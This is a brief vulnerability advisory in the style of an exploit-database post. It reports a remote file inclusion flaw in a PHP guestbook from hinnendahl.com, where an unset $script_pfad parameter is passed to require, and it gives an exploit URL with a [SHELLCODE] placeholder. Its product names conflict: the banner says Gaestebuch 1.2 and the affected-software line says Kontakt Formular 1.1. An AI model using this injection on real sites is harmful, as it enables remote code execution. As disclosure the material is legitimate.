######################################################## # # # HINNENDAHL.COM Gaestebuch 1.2 # # # # Remote File Inclusion Vulnerability # # # # by bd0rk || SOH-Crew # # # # www.soh-crew.it.tt # # # # Contact: bd0rk[at]hackermail.com # # # ######################################################## [~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1 [~] Vendor: http://www.hinnendahl.com/ [~] Download: http://www.hinnendahl.com/index.php?seite=download [*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s Description: The $script_pfad parameter in /guestbook/gbook.php isn't declared before require. So an attacker can execute some php-shellcode about it. (line 3 - 4) [+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE] ### The 21 years old, german Hacker bd0rk ### <---white-hat :-)